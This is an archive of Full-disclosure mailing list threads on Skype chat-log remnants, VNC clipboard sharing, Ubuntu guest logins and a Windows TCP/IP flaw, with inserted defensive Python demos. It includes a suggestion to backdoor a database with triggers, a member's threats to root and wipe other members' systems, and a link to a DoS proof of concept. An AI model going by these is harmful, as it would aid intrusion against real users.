>>>> - snmp_login : Brute-force SNMPv1/2 and SNMPv3
>>>> - unzip_pass : Brute-force the password of encrypted ZIP files
>>>> - keystore_pass : Brute-force the password of Java keystore files
>>>>
>>>> The name Patator comes from the famous weapon: http://www.youtube.com/watch?v=xoBkBvnTTjo
>>>>
>>>> Cheers!
>
> --
> Andrés Riancho
> Director of Web Security at Rapid7 LLC
> Founder at Bonsai Information Security
> Project Leader at w3af
Re: [Full-disclosure] Skype v. 5.x.x - information disclosure
Good find. I think it should also be possible to disable the delete * command with triggers, as a nice way to backdoor the database (almost non-intrusive compared with installing rogue plugins, and the user isn't likely to ever find out).

On Mon, Feb 13, 2012 at 11:25 AM, Osama Bin Error oer...@gmail.com wrote:

> Title:
> ==
> Skype v. 5.x.x - information disclosure
>
> Date:
> =
> 2012-02-13
>
> Introduction:
> =
> Skype is a proprietary voice-over-Internet Protocol service and software application.
>
> Abstract:
> =
> We have discovered improper chat log handling, which results in the logs remaining accessible even if the user had enabled the "no history" option under the "Keep history for" settings, or even destroyed them manually with the "Clear history" button.
>
> Report-Timeline:
> 2012-02-13: Public Disclosure
>
> Status:
> Published
>
> Exploitation-Technique:
> ===
> Local
>
> Severity:
> =
> Low
>
> Details:
> As mentioned in the Skype FAQ (https://support.skype.com/en-gb/faq/FA140/Managing-your-privacy-settings-Windows):
>
>> You can choose how long to keep your conversation history for, or delete it altogether.
>> 1. To change your history settings, in Skype from the menu bar click Skype > Privacy.
>> 2. Below Keep history for, click on the drop-down list and select the amount of time you would like your history to be saved for. Choose from forever, 3 months, 1 month, 2 weeks or no history at all.
>> 3. To delete your conversation history, click Clear history. This removes your entire history, including instant messages, calls, voicemails, text messages, sent and received files. If you delete your conversation history, you cannot recover it.
>
> This sounds safe, but in fact Skype stores all incoming and outgoing chat messages in a local sqlite3 DB (file main.db, table Messages), in plain text. Even if the "Keep history for: no history" option in Settings > Security is enabled, Skype writes all your data into the Messages table, but executes "delete * from Messages" after program exit.
> This command will destroy messages at the logical level in the DB, but in fact, at the physical level all message data stays alive (blocks in the DB file are only marked as destroyed), and can simply be recovered even with a text editor (as mentioned above, it is stored in plain text).
>
> Proof of Concept:
> =
> In Windows XP, go to C:\Documents and Settings\%user name%\Application Data\Skype\%Skype user name% and open file main.db with a text editor. All the ducks inside.
>
> Credits:
> Anonymous
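The advisory's claim that a logical delete leaves the message bytes in main.db is easy to check, and the two SQLite mechanisms that actually remove them (PRAGMA secure_delete and VACUUM) are worth seeing side by side. This is an added example, not Skype's code and touching no Skype files: it builds a throwaway database with the same shape (table Messages, plaintext body), deletes the row, and scans the raw file for a constructed marker string.

```python
"""Deleted SQLite rows stay in the file until zeroed or vacuumed."""
import os
import sqlite3
import tempfile

# Constructed sample message; any distinctive string works for the raw scan.
MARKER = "constructed-secret-message-7f3a"


def _write_and_delete(path, secure, vacuum):
    """Create a Messages table, store one message, then delete it.

    secure: PRAGMA secure_delete=ON makes SQLite zero freed cells and pages.
    vacuum: rebuild the file from the live rows after the delete.
    """
    conn = sqlite3.connect(path)
    # Set explicitly either way: some distribution builds compile SQLite with
    # secure_delete on by default, which would hide the effect under test.
    conn.execute("PRAGMA secure_delete = ON" if secure else "PRAGMA secure_delete = OFF")
    conn.execute("CREATE TABLE Messages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO Messages (body) VALUES (?)", (MARKER,))
    conn.commit()
    # The logical delete the advisory describes Skype running on exit.
    conn.execute("DELETE FROM Messages")
    conn.commit()
    if vacuum:
        # VACUUM refuses to run inside a transaction, hence the commit above.
        conn.execute("VACUUM")
    conn.close()


def plaintext_survives(secure=False, vacuum=False):
    """True if the deleted message can still be found in the raw main.db bytes."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "main.db")
        _write_and_delete(path, secure, vacuum)
        with open(path, "rb") as fh:
            return MARKER.encode() in fh.read()


if __name__ == "__main__":
    print("plain DELETE, text still in file:", plaintext_survives())
    print("secure_delete ON, text in file:  ", plaintext_survives(secure=True))
    print("DELETE then VACUUM, text in file:", plaintext_survives(vacuum=True))
```

Rollback journals and WAL files are a separate copy of the same pages; an application that wants the history gone has to deal with those too, not only the main file.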
Re: [Full-disclosure] Exploit Pack - New video - Ultimate 2.1
I fear the day when he finally succeeds in making enough people believe he's a real security researcher. I wish attrition.org did a piece on him in the charlatans section.

2012/1/30 Peter Osterberg j...@vel.nu:

> This is Juan Sacco's new spam puppet. He just posted the same thing using his real name elsewhere.
>
> nore...@exploitpack.com wrote:
>
>> Exploit Pack - New video!
>> Release - Ultimate 2.1
>> Check it out! http://www.youtube.com/watch?v=4TrsFry13TU
>> Exploit Pack Team
>> http://exploitpack.com
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
>> IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels.
>
> That is *precisely* what VNC is: an open-source IP KVM.

No, it's not. I won't go into the differences because other people already did in this thread.

> And please don't turn this into "you're stupid", because I've seen others with the same setup. As mentioned, I know of a government agency with highly competent IT staff who had a similar setup: normal and sensitive work is on the desktop/notebook and Internet access (which is considered insecure) is on a remote machine, with a viewer on the desktop.

That proves nothing. For example, there are many SCADA devices owned by government agencies connected to the Internet, but that doesn't mean it's a good idea to do so.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V, because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted.

Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea.

The bottom line is, the problem here is using VNC for what Ben is using it for. There are many more problems with that scenario and clipboard sharing may be the least of them.

On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:

> On 01/24/2012 07:18 PM, Mario Vilas wrote:
>
>>> Guys, could you please read carefully everything before you reply?
>>
>> I read carefully. It still didn't make sense, though.
>>
>>> And you wouldn't be allowed to use copy-paste while you edit sensitive documents either, I guess?
>>
>> I don't know how you could get to such a conclusion from what I wrote.
>>
>> You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
>
> I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted; this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or...
> Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on the server for notepad to be aware that Paste shouldn't be grayed out...
>
> I think Ben's report makes complete sense actually; it would be better to have the clipboard feature as a default. Security before features... =)
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Fair enough :)

On Wed, Jan 25, 2012 at 10:59 AM, Peter Osterberg j...@vel.nu wrote:

> On 01/25/2012 10:54 AM, Mario Vilas wrote:
>
>> The bottom line is, the problem here is using VNC for what Ben is using it for. There are many more problems with that scenario and clipboard sharing may be the least of them.
>
> That may very well be true. I am not trying to debate that.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On Tue, Jan 24, 2012 at 2:34 PM, Ben Bucksch n...@bucksch.org wrote:

> Actual result: notepad.exe shows "My password"
> Expected result: Nothing.

No. Expected result is to have the clipboard text sent to the remote machine, if you have your client configured to do so. In a really security-sensitive environment you wouldn't be using the clipboard for passwords anyway. Or you would disable clipboard sharing. Or you wouldn't use a cleartext protocol to begin with.

You might as well report that if the user copies the password to the clipboard at any other point during the session it also gets sent to the server. I don't see why this should be the concern of the developers of any VNC client.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
> Guys, could you please read carefully everything before you reply?

I read carefully. It still didn't make sense, though.

> And you wouldn't be allowed to use copy-paste while you edit sensitive documents either, I guess?

I don't know how you could get to such a conclusion from what I wrote.

You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.

On top of that, the attack scenario doesn't sound too good either. I fail to see why you would need to copy-paste a password to access an untrusted machine and then worry that machine might get to see the password to itself. Also, most VNC servers store the password in clear text in the configuration, and the entire protocol is in plain text, for crying out loud. A scenario where this could be a problem is so bizarre I sincerely can't blame the
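Since the whole thread turns on the viewer pushing its clipboard to the server on connect, in a plaintext protocol, here is what that looks like on the wire and how a sensor can spot it. This is an added example, not code from any VNC project: RFB (RFC 6143, section 7.5) carries the viewer's clipboard as a ClientCutText message (type 6), so a capture of an unencrypted session shows exactly what was sent and whether it went out before the user had typed or clicked anything; the sample client stream is constructed, and the function names are this example's own.

```python
"""Spot clipboard transfers in a captured client-to-server RFB (VNC) stream."""
import struct

# Client-to-server message types with fixed sizes (RFC 6143 section 7.5):
# 0 SetPixelFormat (20), 3 FramebufferUpdateRequest (10), 4 KeyEvent (8),
# 5 PointerEvent (6). SetEncodings and ClientCutText are variable-length.
FIXED_SIZES = {0: 20, 3: 10, 4: 8, 5: 6}
SET_ENCODINGS, CLIENT_CUT_TEXT = 2, 6


def client_cut_text(text):
    """Encode a ClientCutText message; used here only to build the sample."""
    body = text.encode("latin-1")
    return struct.pack("!BxxxI", CLIENT_CUT_TEXT, len(body)) + body


def parse_client_messages(stream):
    """Walk the client messages that follow the handshake and ClientInit.
    Yields (type, offset, payload); payload is the clipboard text for
    ClientCutText and None otherwise. Stops quietly at a truncated message."""
    pos = 0
    while pos < len(stream):
        mtype = stream[pos]
        payload = None
        if mtype in FIXED_SIZES:
            size = FIXED_SIZES[mtype]
        elif mtype == SET_ENCODINGS:
            if pos + 4 > len(stream):
                return
            (count,) = struct.unpack_from("!H", stream, pos + 2)
            size = 4 + 4 * count
        elif mtype == CLIENT_CUT_TEXT:
            if pos + 8 > len(stream):
                return
            (length,) = struct.unpack_from("!I", stream, pos + 4)
            size = 8 + length
            payload = stream[pos + 8:pos + size].decode("latin-1")
        else:
            raise ValueError(f"unknown client message type {mtype} at {pos}")
        if pos + size > len(stream):
            return  # truncated capture
        yield mtype, pos, payload
        pos += size


def clipboard_leaks(stream, before_input=True):
    """Return the clipboard texts the viewer sent. With before_input=True only
    texts sent before any key or pointer event count: the "sent on connect,
    without the user pasting" case the thread is about."""
    leaks = []
    for mtype, _, payload in parse_client_messages(stream):
        if mtype == CLIENT_CUT_TEXT:
            leaks.append(payload)
        elif before_input and mtype in (4, 5):
            break
    return leaks


# Constructed sample: the viewer sends its pixel format and encodings, pushes
# the clipboard at once, asks for a framebuffer update, and only then presses
# a key and sends a second clipboard update.
SAMPLE_STREAM = (
    struct.pack("!BxxxI", 0, 0) + bytes(12)                 # SetPixelFormat
    + struct.pack("!BxH", SET_ENCODINGS, 2) + struct.pack("!ii", 0, 1)
    + client_cut_text("My password")                        # clipboard on connect
    + struct.pack("!BBHHHH", 3, 0, 0, 0, 1024, 768)         # FramebufferUpdateRequest
    + struct.pack("!BBxxI", 4, 1, 0x61)                     # KeyEvent, 'a' down
    + client_cut_text("typed later")                        # after user input
)

if __name__ == "__main__":
    print("sent before any input:", clipboard_leaks(SAMPLE_STREAM))
    print("all clipboard transfers:", clipboard_leaks(SAMPLE_STREAM, before_input=False))
```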
Re: [Full-disclosure] Exploit Pack - Happy new year!
Just out of curiosity, exactly how do you measure that?

On Wed, Jan 18, 2012 at 8:25 PM, nore...@exploitpack.com wrote:

> +20k active users
Re: [Full-disclosure] OFF-Spanish content: CURSO WEB HACKING ONLINE GRATUITO.
50 US dollars per student just to pay for the video streaming? I have a hard time believing that.

2012/1/3 runlvl run...@gmail.com:

> Cost: 50 USD (to pay for streaming)
Re: [Full-disclosure] Large password list
On Fri, Dec 2, 2011 at 3:05 AM, adam a...@papsy.net wrote:

> C:\Users\adam\Desktop> ls -la combined.zip | gawk {print $5}
> *31337*317

That's a funny coincidence. :)
Re: [Full-disclosure] New FREE security tool!
Indeed, Juan Sacco is the author. It's pretty clear from the about page on the site, and the whois record on the domain. I don't think it's meant to be a secret.

Now, I know his track record on this list is less than ideal, but let's try to be professional and wait for the source code to show up before criticizing it. :)

On Thu, Dec 1, 2011 at 5:11 AM, Stefan Edwards saedwards@gmail.com wrote:

> From one of the earlier emails to the list:
>
>> Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a...
>
> On Wed, Nov 30, 2011 at 10:58 PM, Gino g...@1337.io wrote:
>
>> Seems to have Juan Succo written all over it
>>
>> On 11/30/11 1:49 AM, Mario Vilas wrote:
>>
>>> Hi,
>>>
>>> I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads).
>>>
>>> Also, the github repository where you're hosting the source code appears to be empty.
>>>
>>> Cheers,
>>> -Mario
>>>
>>> On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com wrote:
>>>
>>>> Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits in the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules.
>>>> The latest release, version 1.1, is available for download right away!
>>>> Take a look at the new features in this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg
>>>> Download it directly from the main site: http://www.exploitpack.com
>>>> We are looking for investors or donations to keep this project alive! Thank you!
>>>> The only one who has daily updates
>>>> Exploit Pack
>
> --
> Q. How many Prolog programmers does it take to change a lightbulb?
> A. No.
Re: [Full-disclosure] New FREE security tool!
Hi,

I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads).

Also, the github repository where you're hosting the source code appears to be empty.

Cheers,
-Mario

On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com wrote:

> Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits in the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules.
> The latest release, version 1.1, is available for download right away!
> Take a look at the new features in this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg
> Download it directly from the main site: http://www.exploitpack.com
> We are looking for investors or donations to keep this project alive! Thank you!
> The only one who has daily updates
> Exploit Pack
Re: [Full-disclosure] NEVER AGAIN
I'd love to know what number he called. Or at least what country+area code.

On Tue, Nov 22, 2011 at 11:34 PM, root ro...@fibertel.com.ar wrote:
> Please call again, I didn't get it. Sure you have my number right?
> btw, chill man!
>
> On 11/22/2011 04:48 AM, xD 0x41 wrote:
>> You fucking pieces of shit forget when it was once me who was asking for help in regards to multiple things, and when offered NONE, in regards to code I later had to find thanks to fucking blakhatz, why the fuck would I want or care for this list now, forget any competition I ever started, you clearly want, and, forget to see, even when it may be something small for YOU, it may be NOT for me, yet, I am hit from every side, nonstop about shit, which I KNOW there are plenty of you who also have these codes, and that's exactly why you stfu and let me cop it. Seriously, when I was the one asking, I made NO big deal, when I was multiple times confronted with exactly how I acted, and that was simply to NOT show things, because I did this on a per-person basis, if I knew I could trust, then they were shown things.. and they will always be shown things, as they remain friends.. the rest of you who shot your mouths off, watch the hell out, coz you may find a new user on your system soon called 'arsehole' and all he wants to do is get root, so he can rm it. a nice fucking wurm you all deserve... harvesting of your domains, those who spoke out and bombed me for shit-all, and helped me not one bit when I had my ass on the line for shit like freepbx :s screw this list, believe it, I will root the people who annoyed me, one by one, and yes, I'll FD that. now, fuck you all, except the very few, who know who they are. the rest of you who ignored me, and now dare to backlash chat me about a crappy bash 0day you DON'T have, go fk yourselves, and for valdis, I hope your vt.edu has a whole slew of new users, you suck as any kind of friend or moderator, you're also the BIGGEST liar, who cannot code a thing, on this fucking list. dick.
>>
>> as for root@fibertel, indeed stfu, it was me on the phone, just know that, your job is gone.
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
Let's not overreact. We're talking about a guest account only on desktop systems, for local login only, and perfectly visible to the user. The only problem I see here is not having a simple GUI way to disable the guest login for a non tech-savvy user, but no more. (Or am I missing something here?)

On Thu, Nov 17, 2011 at 9:52 PM, Olivier feui...@bibibox.fr wrote:
> On 11/17/2011 08:34 PM, Ryan Dewhurst wrote:
>> Are there any other services this may affect?
>
> The question could also be how many features like this are (will be?) silently enabled by default on new Ubuntu systems.
>
> "Perfect for business use, Ubuntu is safe, intuitive and stable" -- http://www.ubuntu.com/business
>
> Ubuntu is clearly no longer recommended for business use. End users will have to become security experts to avoid teenagers' attacks ... shameful
>
> On Thu, Nov 17, 2011 at 7:18 PM, Andrew N Dowden andrew_dow...@softdesign.net.nz wrote:
>> On 18/11/11 23:46, Larry W. Cashdollar wrote:
>>> Anyone know what the default is for Ubuntu 11
>>> PermitEmptyPasswords no
>>> PasswordAuthentication no
>>> in /etc/ssh/sshd_config?
>>
>> for Ubuntu 11.10 (Oneiric) snip: ( from /etc/ssh/sshd_config )
>> --
>> # To enable empty passwords, change to yes (NOT RECOMMENDED)
>> PermitEmptyPasswords no
>> --
>> # Change to no to disable tunnelled clear text passwords
>> #PasswordAuthentication yes
>> --
>
> --
> Olivier
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
The guest account has no password, but it's not possible to login remotely with ssh.

On Thu, Nov 17, 2011 at 5:28 PM, Dave m...@propergander.org.uk wrote:
> Hi,
>
> What is the password for this guest account? Is the password randomly generated? Is remote access of any kind enabled by default for this guest account? In what way is the guest account different from any of the half dozen or so other accounts (with the obvious exception of access rights) created during a default Ubuntu install? How insecure is it really?
>
> I am not an Ubuntu expert so these are genuine questions, I am far too busy to research this at this time so I ask these questions in the hope that an Ubuntu Guru comes forth and either allays all my/your/our fears (if they exist) or scares me/us into action.
>
> regards
> Dave
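Mario's claim that the passwordless guest account is not reachable over ssh rests on how sshd reads the config quoted in the previous message: a '#'-prefixed line only documents the compiled-in default, and for every keyword the first value sshd reads is the one that counts. The following Python is an added example, not code from the thread or from Ubuntu; it evaluates the effective settings of a constructed sshd_config excerpt together with a constructed shadow line and reports whether an empty-password login over SSH would be possible. Assumptions: only the global section before any Match block is considered, and PAM's own rules (which can further restrict empty passwords) are out of scope.

```python
"""Decide whether a passwordless local account is reachable over SSH.

Added example for the Ubuntu guest-account thread; not code from the list
or from Ubuntu. Two rules of sshd_config(5) do the work: a '#' line is a
comment that merely shows the compiled-in default, and for each keyword
sshd uses the FIRST value it obtains. Sample config and shadow line are
constructed.
"""

# Constructed excerpt modelled on the Oneiric defaults quoted in the thread.
SAMPLE_SSHD_CONFIG = """\
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
UsePAM yes
"""

# Constructed /etc/shadow-style line: the password field (2nd) is empty.
SAMPLE_SHADOW = "guest::15000:0:99999:7:::\n"

# Compiled-in defaults for the two keywords that matter here (sshd_config(5)).
DEFAULTS = {"permitemptypasswords": "no", "passwordauthentication": "yes"}


def effective_settings(text):
    """Return {lowercase keyword: first value} for the global section.

    Comments and blank lines are skipped. Parsing stops at the first
    'Match' line because values inside a Match block are conditional
    (assumption: the global section is what we want to audit).
    """
    seen = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # sshd_config allows "Keyword value" or "Keyword=value".
        parts = line.replace("=", " ", 1).split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        seen.setdefault(key, value)  # first obtained value wins
    return seen


def passwordless_accounts(shadow_text):
    """Usernames whose shadow password field is empty (no password at all)."""
    users = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] == "":
            users.append(fields[0])
    return users


def ssh_empty_password_risk(config_text, shadow_text):
    """True only if sshd would accept an empty password AND such an account exists."""
    cfg = {**DEFAULTS, **effective_settings(config_text)}
    sshd_allows = (cfg["permitemptypasswords"].lower() == "yes"
                   and cfg["passwordauthentication"].lower() == "yes")
    return sshd_allows and bool(passwordless_accounts(shadow_text))


if __name__ == "__main__":
    print("effective:", effective_settings(SAMPLE_SSHD_CONFIG))
    print("passwordless accounts:", passwordless_accounts(SAMPLE_SHADOW))
    print("empty-password ssh login possible:",
          ssh_empty_password_risk(SAMPLE_SSHD_CONFIG, SAMPLE_SHADOW))
```

The first-value-wins rule is the part worth remembering: appending `PermitEmptyPasswords no` at the bottom of a file that already says `yes` higher up changes nothing, which is why the checker reads the file top to bottom and keeps the first hit.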
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
I've used Impacket to craft raw packets of all kinds. Then again I don't know if that counts - I used to work at Core at the time, so it was pretty much the only choice due to licensing issues with other libraries. I don't mean to say it's a bad tool to work with, not at all. I happen to prefer the newer Scapy, but it's just a matter of personal taste. :)

On Sat, Nov 12, 2011 at 6:53 AM, Antony widmal antony.wid...@gmail.com wrote:
> Dear Dan,
>
> Impacket was at first a Pysmb copy/update from Core Security in order to play with RPC. (look at the source) They've done some work on the pysmb library in order to implement DCE/RPC functionality in this dinosaur lib. Saying that we should use Impacket in order to craft *raw* UDP packets is definitely the dumbest thing I've heard today. Seriously. Can anyone confirm that? Mario? Carlos?
>
> Anyways, this guy doesn't understand shit, talks a lot about shit he doesn't know about, why would you even spend time reading his shit? This vulnerability is about sending a *huge fucking* stream of UDP packets to a closed port in order to trigger an int overflow via a ref count. Most of the people here didn't even understand what we are talking about/dealing with.
>
> Anyways, it's probably time for you to unsubscribe since you don't follow and S-K's like sec...@gmail.com are trying to act like they know. Yeah right, a UDP int overflow triggered via a refcount UDP overflow that you can trigger with 1 single TCP (with the right ACK) packet is the way to go. This mailing list is getting gay, seriously.
>
> Cheers,
> Antony.
>
> On Fri, Nov 11, 2011 at 3:10 PM, Dan Ballance tzewang.do...@gmail.com wrote:
>> Okay, now I'm confused! From http://oss.coresecurity.com/projects/impacket.html
>>
>> "Impacket is a collection of Python classes focused on providing access to network packets. Impacket allows Python developers to craft and decode network packets in a simple and consistent manner. It includes support for low-level protocols such as IP, UDP and TCP, as well as higher-level protocols such as NMB and SMB. Impacket is highly effective when used in conjunction with a packet capture utility or package such as Pcapy (http://oss.coresecurity.com/projects/pcapy.html). Packets can be constructed from scratch, as well as parsed from raw data. Furthermore, the object oriented API makes it simple to work with deep protocol hierarchies."
>>
>> Thanks for your input Antony. Can you explain why impacket has nothing to do with crafting UDP packets? Fascinating thread this. Thanks to all!!
>>
>> dan :)
>>
>> On 11 November 2011 22:42, Antony widmal antony.wid...@gmail.com wrote:
>>> You are definitely a lamer secn3t. Also for your little brain, impacket has nothing to do with crafting UDP packets.. Thanks for proving this again and again.
>>>
>>> On Fri, Nov 11, 2011 at 2:36 PM, xD 0x41 sec...@gmail.com wrote:
>>>> well look at that :P not the same author but, nice coding predelka! good one, I will add you to crazycoders.com coderslist... I guess there are a few codes you have now done which might be useful... cheers. xd
>>>>
>>>> On 12 November 2011 05:43, Ryan Dewhurst ryandewhu...@gmail.com wrote:
>>>>> An attempt at a possible MS11-083 DoS/PoC exploit, by @hackerfantastic: http://pastebin.com/fjZ1k0fi
>>>>>
>>>>> On Fri, Nov 11, 2011 at 5:08 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:
>>>>>> Yeah, I gotta say, I'm going to use it at some point ;)
>>>>>>
>>>>>> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Mario Vilas
>>>>>> Sent: Friday, November 11, 2011 9:02 AM
>>>>>> To: Ryan Dewhurst
>>>>>> Cc: full-disclosure@lists.grok.org.uk
>>>>>> Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
>>>>>>
>>>>>> I liked the heavy breather in the perv closet bit.
>>>>>>
>>>>>> On Fri, Nov 11, 2011 at 5:43 PM, Ryan Dewhurst ryandewhu...@gmail.com wrote:
>>>>>>> I think Jon just said what everyone else was thinking, he said what I was thinking at least.
>>>>>>>
>>>>>>> On Fri, Nov 11, 2011 at 1:54 PM, Jon Kertz jon.ke...@gmail.com wrote:
>>>>>>>> On Thu, Nov 10, 2011 at 2:59 PM, xD 0x41 sec...@gmail.com wrote:
>>>>>>>>> About the PPS, I think that's a very bad summary of the exploit, 49 days to send a packet, my butt. There are many people assuming wrong things, when it can be done in seconds, syscanner would scan a -b class in minutes, remember it only has to find the vulns, gather, then it would break scan, and trigger vuln... so in a real world botnet, yes then, with tcpip patchers, like so many ppl I know myself, even use (tcpipz patcher), which rocks... and it is the ONLY one which actually works, when you maybe modify the src so the sys file is dropped from within a .cpp file, well that's up to you but that's a better way to make it work, this will open sockets/threads, as I could easily prove with one exe, but, the goal is, to trigger the vuln then exploit it, in less than 49 days :P, so, I guess
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
I liked the heavy breather in the perv closet bit.

On Fri, Nov 11, 2011 at 5:43 PM, Ryan Dewhurst ryandewhu...@gmail.com wrote:
> I think Jon just said what everyone else was thinking, he said what I was thinking at least.
>
> On Fri, Nov 11, 2011 at 1:54 PM, Jon Kertz jon.ke...@gmail.com wrote:
>> On Thu, Nov 10, 2011 at 2:59 PM, xD 0x41 sec...@gmail.com wrote:
>>> About the PPS, I think that's a very bad summary of the exploit, 49 days to send a packet, my butt. There are many people assuming wrong things, when it can be done in seconds, syscanner would scan a -b class in minutes, remember it only has to find the vulns, gather, then it would break scan, and trigger vuln... so in a real world botnet, yes then, with tcpip patchers, like so many ppl I know myself, even use (tcpipz patcher), which rocks... and it is the ONLY one which actually works, when you maybe modify the src so the sys file is dropped from within a .cpp file, well that's up to you but that's a better way to make it work, this will open sockets/threads, as I could easily prove with one exe, but, the goal is, to trigger the vuln then exploit it, in less than 49 days :P, so, I guess if this exploit, in real form, gathered 2 million hosts over 3 nights.. I'm guessing that the exploit could possibly be triggered with ONE properly set up packet.. people forget that, a packet is one thing, and a crafted UDP packet, is quite another..
>>
>> I'd really like to see you actually explain this bug with code. Either with a PoC or with the disassembly. You seem to act like you know what's going on, but so far your description has been off base (from what I can make of your writing). No one cares about paragraphs of speculation and bragging, code or you are just another heavy breather in the perv closet of FD.
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
I have no doubt that a lot of things are lost on you.

On Fri, Nov 11, 2011 at 11:23 PM, xD 0x41 sec...@gmail.com wrote:
> are you braindead? your humor is really lost on me.. so, I think, look within :P
>
> On 12 November 2011 04:01, Mario Vilas mvi...@gmail.com wrote:
>> I liked the heavy breather in the perv closet bit.
>>
>> On Fri, Nov 11, 2011 at 5:43 PM, Ryan Dewhurst ryandewhu...@gmail.com wrote:
>>> I think Jon just said what everyone else was thinking, he said what I was thinking at least.
>>>
>>> On Fri, Nov 11, 2011 at 1:54 PM, Jon Kertz jon.ke...@gmail.com wrote:
>>>> On Thu, Nov 10, 2011 at 2:59 PM, xD 0x41 sec...@gmail.com wrote:
>>>>> About the PPS, I think that's a very bad summary of the exploit, 49 days to send a packet, my butt. There are many people assuming wrong things, when it can be done in seconds, syscanner would scan a -b class in minutes, remember it only has to find the vulns, gather, then it would break scan, and trigger vuln... so in a real world botnet, yes then, with tcpip patchers, like so many ppl I know myself, even use (tcpipz patcher), which rocks... and it is the ONLY one which actually works, when you maybe modify the src so the sys file is dropped from within a .cpp file, well that's up to you but that's a better way to make it work, this will open sockets/threads, as I could easily prove with one exe, but, the goal is, to trigger the vuln then exploit it, in less than 49 days :P, so, I guess if this exploit, in real form, gathered 2 million hosts over 3 nights.. I'm guessing that the exploit could possibly be triggered with ONE properly set up packet.. people forget that, a packet is one thing, and a crafted UDP packet, is quite another..
>>>>
>>>> I'd really like to see you actually explain this bug with code. Either with a PoC or with the disassembly. You seem to act like you know what's going on, but so far your description has been off base (from what I can make of your writing). No one cares about paragraphs of speculation and bragging, code or you are just another heavy breather in the perv closet of FD.
Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
Did you read the comments?

On Fri, Oct 28, 2011 at 3:36 PM, Leon Kaiser litera...@gmail.com wrote:
> Bravo! A completely impartial source.
>
> --
> Leon Kaiser - Head of GNAA Public Relations -
> litera...@gnaa.eu || litera...@goatse.fr
> http://gnaa.eu || http://security.goatse.fr
> 7BEECD8D FCBED526 F7960173 459111CE F01F9923
> http://pgp.mit.edu:11371/pks/lookup?op=vindex&fingerprint=on&search=0x459111CEF01F9923
> "The mask of anonymity is not intensely constructive." -- Andrew "weev" Auernheimer
>
> On Fri, 2011-10-28 at 11:58 +0200, Lucas wrote:
>> Rumors of Tor's compromise are greatly exaggerated:
>> https://blog.torproject.org/blog/rumors-tors-compromise-are-greatly-exaggerated
Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
On Fri, Oct 28, 2011 at 8:02 PM, Leon Kaiser litera...@gmail.com wrote:
> Did you not hear me when I said I don't do blogs?

Hardly anyone heard you, unless they were in the same room as you. Some of us read you, though. It's a good thing you know, reading. You should try sometime.

By the way, have you heard of the Internet, grandpa? I hear it's all the rage nowadays. They say it's even better than Fidonet!
Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
I also got that impression :( where is that clarified?

On Mon, Oct 24, 2011 at 6:13 PM, char...@funkymunkey.com wrote:
> Withdrawn :P
>
> Quoting char...@funkymunkey.com:
>> I got the impression that they have fully compromised the actual TOR network, not a dummy network, am I wrong?
>>
>> Charlie
>>
>> Quoting Travis Biehn tbi...@gmail.com:
>>> So they put up a fake network, 'hacked' most of the nodes, and with complete control of their dummy network they were able to figure out traffic movement? This is news why?
>>>
